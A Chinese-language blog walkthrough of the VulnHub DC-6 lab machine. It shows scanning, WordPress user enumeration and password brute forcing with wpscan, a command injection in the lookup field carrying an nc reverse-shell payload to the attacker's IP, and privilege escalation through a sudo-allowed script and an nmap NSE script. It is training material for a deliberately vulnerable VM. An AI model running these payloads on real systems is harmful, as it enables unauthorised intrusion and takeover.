靶机下载地址:https://www.vulnhub.com/entry/dc-6,315/
信息收集
老样子先扫ip
arp-scan -l
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-18.png)
192.168.49.128
nmap扫描开放端口信息
nmap -A 192.168.49.128
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-19.png)
熟悉的22和80端口
去访问80端口的页面时发现自动跳转到了 wordy/
要去hosts里加一个指向
win修改:
C:\WINDOWS\system32\drivers\etc\hosts
添加:
192.168.49.128 http://wordy
liunx修改:
vim /etc/hosts
一样添加即可成功访问
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-20-1024x502.png)
使用指纹探测工具获取信息
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-21-1024x226.png)
发现是wordprss
再用尝试dirsearch扫目录
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-22-1024x613.png)
访问wp-login.php
不知道用户名和密码是什么
使用wpscan去扫扫看(kali自带)
wpscan --url wordy -e u
扫出来了五个用户
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-23.png)
然后在靶机的下载地址找到了提示
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-24-1024x123.png)
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-25-1024x115.png)
cd /usr/share/wordlists
cp rockyou.txt.gz rockyou.txt.gz.bak
gunzip rockyou.txt.gz rockyou.txt
cat /usr/share/wordlists/rockyou.txt | grep k01 > wordy-passwd1.dic
然后再爆破用户名和密码
wpscan --url wordy -u user.txt -P wordy-passwd1.dic
这里的user.txt是前面的五个
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-26-1024x242.png)
成功爆出来了mark的密码是helpdesk01
开始去获得shell
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-27-1024x485.png)
成功登录发现在Activity monitor存在功能 IP 转十进制和一个域名解析lookup的功能、使用nslookup命令执行的,可能存在一个RCE的漏洞
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-28-1024x416.png)
执行命令发现有长度限制
前端修改输入长度
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-29-1024x358.png)
然后就直接反弹shell就好了
114.114.114.114;nc -e /bin/bash 192.168.49.131 2333
这里我包是发出去了也卡住了
bp也可以
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-30-1024x635.png)
使用python起一个交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
在home里发现四个用户
一个一个进行查看,最后进入到mark用户的家目录下,stuff文件下有一个things-to-do.txt文件,查看文件内容发现graham用户及登录密码
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-31.png)
用户名:graham 密码:GSo7isUM1D4
切换用户
su graham
然后使用
sudo -l
发现jens可以免密执行一个sh
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-32.png)
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-33-1024x585.png)
向backups.sh文件中写入”/bin/bash”,并以jens用户去执行该脚本
echo "/bin/bash" >>backups.sh
sudo -u jens ./backups.sh
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-34.png)
然后再看
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-35.png)
发现可以免密以root执行nmap
以此来提权
写入一条命令到getShell,并通过nmap运行getShell成功进入root用户
echo 'os.execute("/bin/sh")' > getShell
sudo nmap --script=getShell
![](https://wuwupor.xyz/wp-content/uploads/2024/08/image-36-1024x355.png)
Comments | NOTHING